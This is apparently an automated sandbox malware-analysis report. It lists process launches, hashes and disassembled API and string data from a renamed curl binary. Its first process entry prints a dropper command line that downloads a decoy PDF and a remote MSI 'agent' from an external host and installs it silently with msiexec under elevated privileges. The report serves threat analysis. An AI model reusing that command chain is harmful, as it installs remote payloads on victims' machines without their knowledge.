                                  Commandline:cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:08:42:03
                                  Start date:07/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:08:42:03
                                  Start date:07/10/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c cd /d "C:\"
                                  Imagebase:0x240000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:08:42:03
                                  Start date:07/10/2024
                                  Path:C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                  Wow64 process (32bit):true
                                  Commandline:TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf
                                  Imagebase:0xe00000
                                  File size:470'528 bytes
                                  MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 0%, ReversingLabs
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:4
                                  Start time:08:42:04
                                  Start date:07/10/2024
                                  Path:C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe
                                  Wow64 process (32bit):true
                                  Commandline:TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent
                                  Imagebase:0xe00000
                                  File size:470'528 bytes
                                  MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:5
                                  Start time:08:42:04
                                  Start date:07/10/2024
                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
                                  Imagebase:0x850000
                                  File size:59'904 bytes
                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:08:42:04
                                  Start date:07/10/2024
                                  Path:C:\Windows\System32\msiexec.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                  Imagebase:0x7ff67f4b0000
                                  File size:69'632 bytes
                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false


                                    Execution Graph

                                    Execution Coverage:1.8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.8%
                                    Total number of Nodes:837
                                    Total number of Limit Nodes:26
41307->41258 41460 e0913e 20 API calls 41308->41460 41309->41300 41310->41312 41310->41317 41312->41162 41313 e12119 14 API calls 41313->41312 41314 e09749 41456 e0913e 20 API calls 41314->41456 41315 e09a52 41315->41307 41317->41312 41317->41313 41318->41275 41318->41314 41319->41162 41320->41156 41322 e18b15 41321->41322 41323 e18b2a 41321->41323 41322->41323 41324 e18b83 41322->41324 41499 e16f2d 102 API calls _ValidateLocalCookies 41322->41499 41323->41154 41491 e295d1 41324->41491 41327 e16aa3 free 41329 e18b95 41327->41329 41330 e2d032 free 41329->41330 41331 e18ba0 41329->41331 41330->41331 41332 e2d032 free 41331->41332 41333 e18bbc WSACloseEvent 41332->41333 41334 e18bd7 free 41333->41334 41334->41323 41335->41162 41336->41179 41338 e2e994 41337->41338 41339 e2e99e socket 41337->41339 41338->41183 41340 e2e9b1 closesocket 41339->41340 41341 e2e9ba 41339->41341 41340->41341 41341->41183 41343 e16ab9 41342->41343 41344 e16acd 41343->41344 41346 e2d032 free 41343->41346 41345 e2d032 free 41344->41345 41347 e16ad4 41345->41347 41346->41343 41348 e2d032 41347->41348 41349 e16c74 41348->41349 41350 e2d03b 41348->41350 41349->41188 41349->41190 41351 e2d06b free 41350->41351 41351->41349 41352->41200 41353->41199 41354->41201 41355->41220 41356->41205 41358 e34873 GetTickCount 41357->41358 41359 e3481c QueryPerformanceCounter 41357->41359 41360 e3483e __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 41358->41360 41359->41360 41360->41227 41362 e17bc8 41361->41362 41367 e189ca 41361->41367 41362->41367 41369 e17bf1 41362->41369 41374 e16f2d 102 API calls _ValidateLocalCookies 41362->41374 41364 e195e3 19 API calls 41364->41369 41367->41227 41369->41364 41369->41367 41375 e17961 102 API calls 41369->41375 41376 e29e52 18 API calls 41369->41376 41377 e22166 82 API calls 41369->41377 41378 e30211 20 API calls 41369->41378 41371->41230 41372->41230 41373->41232 41374->41369 41375->41369 41376->41369 41377->41369 41378->41369 41463 e11535 41379->41463 41383 e21ae5 
41382->41383 41384 e216dc 41382->41384 41383->41282 41384->41383 41482 e1956a 17 API calls 41384->41482 41386 e216f1 41483 e17405 18 API calls 41386->41483 41388 e216f8 41389 e21706 41388->41389 41484 e17276 108 API calls 41388->41484 41391 e18b08 240 API calls 41389->41391 41393 e21712 41389->41393 41391->41393 41392 e21743 41485 e239d0 266 API calls 41392->41485 41393->41392 41395 e21740 free 41393->41395 41395->41392 41396 e2174a 41486 e274bc 17 API calls 41396->41486 41398 e21751 free 41400 e21782 free 41398->41400 41487 e27663 free free free 41400->41487 41402 e21792 free 41404 e217b7 free 41402->41404 41405 e217d4 41402->41405 41404->41405 41488 e215c6 21 API calls 41405->41488 41408 e217e1 free 41489 e1d126 free 41408->41489 41411 e21809 free 41490 e21251 101 API calls 41411->41490 41455->41267 41456->41248 41457->41276 41458->41298 41459->41293 41460->41315 41461->41304 41462->41266 41473 e10f87 41463->41473 41465 e1158f 41466 e50ca6 _ValidateLocalCookies 5 API calls 41465->41466 41467 e093bd 41466->41467 41467->41241 41467->41255 41468 e115d6 fputc 41468->41465 41470 e11589 __aulldvrm 41468->41470 41469 e11616 fputc 41469->41465 41469->41470 41470->41465 41470->41468 41470->41469 41471 e1201d 12 API calls 41470->41471 41481 e10e54 __stdio_common_vsprintf 41470->41481 41471->41470 41474 e10fa9 41473->41474 41477 e11430 41473->41477 41475 e10eda strncmp strncmp 41474->41475 41476 e11008 strncmp 41474->41476 41474->41477 41479 e1115a strtol 41474->41479 41480 e11122 strtol 41474->41480 41475->41474 41476->41474 41478 e11026 strncmp 41476->41478 41477->41470 41478->41474 41479->41474 41480->41474 41481->41470 41482->41386 41483->41388 41484->41389 41485->41396 41486->41398 41487->41402 41488->41408 41489->41411 41492 e2965a 41491->41492 41496 e295f2 41491->41496 41493 e50ca6 _ValidateLocalCookies 5 API calls 41492->41493 41494 e18b8d 41493->41494 41494->41327 41495 e29641 41497 e216ca 266 API calls 41495->41497 41496->41495 41500 e22166 82 API calls 
41496->41500 41497->41492 41499->41322 41500->41496 42006 e12769 17 API calls 42007 e0336b 6 API calls 42009 e01f70 29 API calls 42011 e32f70 301 API calls 42014 e51370 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 42017 e0544b 20 API calls _ValidateLocalCookies 41866 e37140 27 API calls 41867 e47d40 21 API calls 41870 e1bd49 free free malloc 41871 e13d50 feof fclose 41872 e3a550 strtol 42022 e4c750 CryptGetHashParam CryptGetHashParam CryptDestroyHash CryptReleaseContext 41873 e0544b 43 API calls _ValidateLocalCookies 41619 e17b5d 41620 e17b8e 41619->41620 41621 e17b69 malloc 41619->41621 41621->41620 41874 e0544b 21 API calls _ValidateLocalCookies 42024 e10320 14 API calls __alldvrm 41877 e4bd2a 51 API calls _ValidateLocalCookies 40928 e0cf30 40956 e032d3 40928->40956 40931 e0cf54 calloc 40934 e0cf70 calloc 40931->40934 40932 e0cf45 40999 e09199 20 API calls 40932->40999 40936 e0cf7e 40934->40936 40935 e0ceee 40966 e1963b 40936->40966 40939 e1963b 133 API calls 40940 e0cfa8 40939->40940 40941 e1963b 133 API calls 40940->40941 40942 e0cfb4 40941->40942 40943 e1963b 133 API calls 40942->40943 40944 e0cfc0 40943->40944 40945 e1963b 133 API calls 40944->40945 40947 e0cfcc 40945->40947 40948 e0cfef 40947->40948 40985 e0da2f 40947->40985 41000 e1978f 268 API calls 40948->41000 40950 e0d00c 40950->40935 40951 e0d016 40950->40951 41001 e0343b 7 API calls 40951->41001 40953 e0d01b 41002 e03460 26 API calls 40953->41002 40955 e0d022 40955->40935 41003 e10dce 40956->41003 40959 e0330a 41012 e03279 free free free 40959->41012 40960 e032f4 malloc 40962 e03303 40960->40962 40963 e03319 40960->40963 41011 e10e10 free free 40962->41011 40964 e0330f 40963->40964 40964->40931 40964->40932 40967 e1964f 40966->40967 40980 e0cf9c 40966->40980 40968 e19673 40967->40968 40969 e196fd 40967->40969 40967->40980 40973 e196c2 40968->40973 40974 e196ec 40968->40974 40968->40980 40970 e19767 40969->40970 40971 e19706 40969->40971 
40972 e1976c 40970->40972 40970->40980 40976 e19741 40971->40976 40977 e19710 40971->40977 40971->40980 41016 e20830 75 API calls 40972->41016 40973->40980 40983 e196e4 free 40973->40983 40974->40980 41014 e20e3f 11 API calls 40974->41014 40978 e19746 calloc 40976->40978 40976->40980 40977->40980 41015 e28f8c 60 API calls 40977->41015 40984 e1975d calloc 40978->40984 40980->40939 40981 e19778 40981->40980 40983->40980 40984->40980 40987 e0da96 40985->40987 40990 e0da54 40985->40990 40986 e0dac4 40988 e0dae7 40986->40988 40996 e0da9a 40986->40996 41021 e0d77a 25 API calls 2 library calls 40986->41021 40987->40986 40987->40996 41020 e0d77a 25 API calls 2 library calls 40987->41020 40992 e0daf5 _strdup 40988->40992 40988->40996 40997 e0da76 40990->40997 41017 e0d8d0 40990->41017 40994 e0db07 40992->40994 40992->40996 41022 e09199 20 API calls 40994->41022 40996->40947 40997->40987 40997->40996 40998 e0d8d0 2 API calls 40997->40998 40998->40987 40999->40935 41000->40950 41001->40953 41002->40955 41004 e10de1 41003->41004 41005 e10dea 41004->41005 41006 e032ea 41004->41006 41013 e10d8d malloc 41005->41013 41006->40959 41006->40960 41006->40964 41008 e10df3 41009 e10e0b 41008->41009 41010 e10e08 free 41008->41010 41009->41006 41010->41009 41011->40959 41012->40964 41013->41008 41014->40980 41015->40980 41016->40981 41018 e10dce 2 API calls 41017->41018 41019 e0d8da 41018->41019 41019->40997 41020->40986 41021->40988 41022->40996 41880 e0d136 16 API calls _strrchr 42028 e17bff 488 API calls 42029 e0af39 65 API calls _ValidateLocalCookies 42030 e0544b 26 API calls 2 library calls 42031 e01b00 33 API calls _ValidateLocalCookies 42032 e03b00 25 API calls 42033 e1aa59 105 API calls 41885 e09d02 29 API calls _ValidateLocalCookies 41886 e3c900 29 API calls 42034 e3db00 free free free free 41888 e0544b 84 API calls _ValidateLocalCookies 42035 e51309 _seh_filter_exe 41889 e17bff 310 API calls 42036 e01f10 _read 41890 e05480 8 API calls _ValidateLocalCookies 42037 e40710 37 API 
calls _ValidateLocalCookies 41893 e51110 17 API calls 2 library calls 42038 e50b10 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 42039 e0544b 78 API calls _ValidateLocalCookies 42040 e5131d _c_exit _exit GetModuleHandleW 42041 e1831f 19 API calls

                                    APIs
                                    • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernel32,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D34B
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,LoadLibraryExA,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D363
                                    • _mbspbrk.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(security.dll,00E57348,?,?,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D374
                                    • LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(security.dll,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D389
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00E34EA1,AddDllDirectory,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D39D
                                    • LoadLibraryExA.KERNELBASE(?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D3B6
                                    • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,00000000,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D3C1
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D3F6
                                    • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000,?,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D406
                                    • LoadLibraryA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-1(00E34EA1,?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D461
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E34EA1,?,?,00E1D2C2), ref: 00E1D478
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$AddressDirectoryProcSystem$HandleModule_mbspbrkfreemalloc
                                    • String ID: AddDllDirectory$LoadLibraryExA$kernel32$security.dll
                                    • API String ID: 184734234-2138446276
                                    • Opcode ID: df4280e80a2f9eac136e0b8c7529a786d8a5a5b16027ec5104d7c6bff1771f85
                                    • Instruction ID: 288c0f408cd4751d4e4337011e14513328dfc38127708fd639cc14ccc81da232
                                    • Opcode Fuzzy Hash: df4280e80a2f9eac136e0b8c7529a786d8a5a5b16027ec5104d7c6bff1771f85
                                    • Instruction Fuzzy Hash: B1418936A08B11EFCF195F25AC286EE3F74EF4575571441A8E802F7251CB315D4ACB90
                                    APIs
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00E115D6
                                    • fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00E11616
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: fputc
                                    • String ID: %ld$.%ld$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                    • API String ID: 1992160199-2365385051
                                    • Opcode ID: 3d473e6040c00e6498dcc55698c5112ff01c814342b02d284089e7eb08097fcf
                                    • Instruction ID: c85b596a58992ce02a2b5b5c5d01e64461a885a7e899d7add45a74b5af415548
                                    • Opcode Fuzzy Hash: 3d473e6040c00e6498dcc55698c5112ff01c814342b02d284089e7eb08097fcf
                                    • Instruction Fuzzy Hash: C662D37120C7418FD718CE28D8847AABBE1EFC4358F245A5EF695A72D1DB70C885CB42
                                    APIs
                                    • _close.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00E0D002,?,?,?,?,?,?,?,00E0CD94,00E0D002,?,?,?), ref: 00E09374
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo,00000002,?,?,00000000,00E0D002), ref: 00E093D4
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E09449
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E094A2
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00E57668,?), ref: 00E09775
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E0978C
                                    • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000078,?,00000000,00E0D002), ref: 00E097DA
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000078,?,00000000,00E0D002), ref: 00E09843
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00E0D002), ref: 00E0988B
                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E09927
                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E0993A
                                    • _get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E09943
                                    • _lseeki64.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000000), ref: 00E09952
                                    • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,?,?,?,00000000,00E0D002), ref: 00E09968
                                    • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000002,?,?,?,?,?,?,?,00000000,00E0D002), ref: 00E0997C
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E09AA7
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E09ABD
                                    Strings
                                    • The Retry-After: time would make this command line exceed the maximum allowed time for retries., xrefs: 00E0974C
                                    • curl: (%d) Failed writing body, xrefs: 00E094BF, 00E097A9
                                    • Removing output file: %s, xrefs: 00E097CA
                                    • Problem %s. Will retry in %ld seconds. %ld retries left., xrefs: 00E098B3
                                    • curl: (%d) %s, xrefs: 00E093B0
                                    • Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u, xrefs: 00E09A45
                                    • M', xrefs: 00E0956B
                                    • curl: (23) Failed seeking to end of file, xrefs: 00E09991
                                    • curl: (23) Failed to truncate file, xrefs: 00E099BD
                                    • Failed to set filetime %I64d on outfile: overflow, xrefs: 00E0986F
                                    • Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u, xrefs: 00E09A6D
                                    • curl: (%d) The requested URL returned error: %ld, xrefs: 00E09416
                                    • Throwing away %I64d bytes, xrefs: 00E09913
                                    • More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo, xrefs: 00E093CF
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _filenofclosefflushfputsfree$File_close_get_osfhandle_lseeki64_strdup_unlinkfseek
                                    • String ID: Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u$Failed to set filetime %I64d on outfile: overflow$M'$More details here: https://curl.se/docs/sslcerts.htmlcurl failed to verify the legitimacy of the server and therefore could notestablish a secure connection to it. To learn more about this situation andhow to fix it, please visit the web page mentioned abo$Problem %s. Will retry in %ld seconds. %ld retries left.$Removing output file: %s$The Retry-After: time would make this command line exceed the maximum allowed time for retries.$Throwing away %I64d bytes$curl: (%d) %s$curl: (%d) Failed writing body$curl: (%d) The requested URL returned error: %ld$curl: (23) Failed seeking to end of file$curl: (23) Failed to truncate file
                                    • API String ID: 968532693-3733868149
                                    • Opcode ID: ebb8deadfbd7cd4370285619c86cc13285b779af4fc9e14c2a37e1d8014a4798
                                    • Instruction ID: d58c9d1fe3217ed01c360927f8cf8725d4daa6ca86d1476f9f322f9bcd0fa467
                                    • Opcode Fuzzy Hash: ebb8deadfbd7cd4370285619c86cc13285b779af4fc9e14c2a37e1d8014a4798
                                    • Instruction Fuzzy Hash: E232CB71A00305AFDB258FA4DC89BAEBBB5FF04309F146429E415B62E3D775AD94CB10

                                    APIs
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00E57A20,?,00000000,00000000), ref: 00E0DC5D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00E0CE9B,?,00E0901E,?), ref: 00E0DC6C
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000), ref: 00E0DCBE
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0DE1A
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000310), ref: 00E0DF7E
                                    Strings
                                    • %s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!, xrefs: 00E0DEFC
                                    • _curlrc, xrefs: 00E0DC94
                                    • <stdin>, xrefs: 00E0DFE8
                                    • .curlrc, xrefs: 00E0DC41
                                    • %s:%d: warning: '%s' %s, xrefs: 00E0E012
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: malloc$__acrt_iob_funcfopenfree
                                    • String ID: %s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!$.curlrc$<stdin>$_curlrc

                                    Control-flow Graph

                                    control_flow_graph 385 e0a06f-e0a085 fopen 386 e0a0a7-e0a0b3 call e0d323 385->386 387 e0a087-e0a08d 385->387 393 e0a0b5-e0a0b8 386->393 394 e0a0db-e0a0e6 call e120e6 386->394 387->386 388 e0a08f-e0a0a5 call e09199 387->388 396 e0a034-e0a038 388->396 393->394 397 e0a0ba-e0a0d9 call e120e6 free 393->397 402 e0a0e9-e0a0eb 394->402 400 e0c5a8-e0c5b1 396->400 397->402 403 e0c5b3-e0c5b5 400->403 404 e0c5b7-e0c5c1 call e09b4c 400->404 405 e0a103-e0a120 call e0d8d0 free 402->405 406 e0a0ed-e0a0ef 402->406 403->404 407 e0c5c4-e0c5d2 call e50ca6 403->407 404->407 418 e0a122-e0a129 fclose 405->418 419 e0a12a-e0a12e 405->419 409 e0a0f1-e0a0f8 fclose 406->409 410 e0a0f9-e0a0fe call e09199 406->410 409->410 421 e0a032 410->421 418->419 419->421 422 e0a134-e0a142 419->422 421->396 423 e0a144-e0a147 422->423 424 e0a1bc call e12235 422->424 425 e0a149-e0a14f 423->425 426 e0a15a-e0a170 fopen 423->426 431 e0a1c1-e0c596 call e091ba call e216ca 424->431 425->426 428 e0a151-e0a158 call e01018 425->428 429 e0a172-e0a1a2 call e0913e free call e0fea5 426->429 430 e0a1a7-e0a1b6 426->430 428->424 429->407 430->424 431->400 445 e0c598-e0c5a5 fclose 431->445 445->400
                                    APIs
                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00E57A20), ref: 00E0A079
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,If-None-Match: %s,00000000), ref: 00E0A0CD
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0A0F2
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0A117
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00E0A123
                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00E0C59E
                                    Strings
                                    • If-None-Match: "", xrefs: 00E0A0DB
                                    • Failed creating file for saving etags: "%s". Skip this transfer, xrefs: 00E0A173
                                    • Failed to allocate memory for custom etag header, xrefs: 00E0A0F9
                                    • k%, xrefs: 00E0A038
                                    • If-None-Match: %s, xrefs: 00E0A0BD
                                    • Failed to open %s, xrefs: 00E0A095
                                    Similarity
                                    • API ID: fclose$free$fopen
                                    • String ID: Failed creating file for saving etags: "%s". Skip this transfer$Failed to allocate memory for custom etag header$Failed to open %s$If-None-Match: ""$If-None-Match: %s$k%

                                    Control-flow Graph

                                    control_flow_graph 722 e0cbae-e0cbc7 723 e0ccd0-e0ccdd call e09c50 722->723 724 e0cbcd-e0cbd3 722->724 727 e0cce2-e0cce5 723->727 724->723 726 e0cbd9-e0cbfa call e12235 call e12362 724->726 732 e0ccfd-e0cd01 726->732 734 e0cc00-e0cc06 726->734 729 e0cce7-e0cce9 727->729 729->732 735 e0ccba-e0ccc2 734->735 736 e0cc0c-e0cc1a call e12677 734->736 737 e0ccc4-e0ccc7 call e216ca 735->737 738 e0cccc-e0ccce 735->738 742 e0cc4c-e0cc5a call e12677 736->742 743 e0cc1c-e0cc2b _strdup 736->743 737->738 738->723 738->729 752 e0cc93-e0cca1 call e12677 742->752 753 e0cc5c-e0cc6b _strdup 742->753 744 e0cc8b-e0cc91 call e12920 743->744 745 e0cc2d-e0cc3e call e12920 call e09199 743->745 756 e0ccb6-e0ccb9 744->756 760 e0cc43-e0ccfc 745->760 752->743 764 e0cca7-e0ccb4 call e0305c 752->764 754 e0cc87 753->754 755 e0cc6d-e0cc85 call e12920 call e09159 753->755 754->744 755->760 756->735 760->732 764->756
                                    APIs
                                      • Part of subcall function 00E12677: realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E27EE5,?,?,?,00E28727,?,?,00000000,?,?,?,00E28849,00000000,?,?), ref: 00E126C4
                                      • Part of subcall function 00E12677: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28849,00000000,?,?,?,00E12373,?,?,?,?,00E016C6,?,00200030), ref: 00E126DF
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E0CC1D
                                      • Part of subcall function 00E12920: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E09117,?,?,?,00000000,Failed to create/open output), ref: 00E12935
                                      • Part of subcall function 00E12677: GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00000000,00000001,?,?,?,00E28727,?,?,00000000,?,?,?,00E28849,00000000,?), ref: 00E12698
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E0CC5D
                                    Strings
                                    Similarity
                                    • API ID: _strdupfree$EnvironmentVariablerealloc
                                    • String ID: CURL_CA_BUNDLE$SSL_CERT_DIR$SSL_CERT_FILE$out of memory

                                    Control-flow Graph

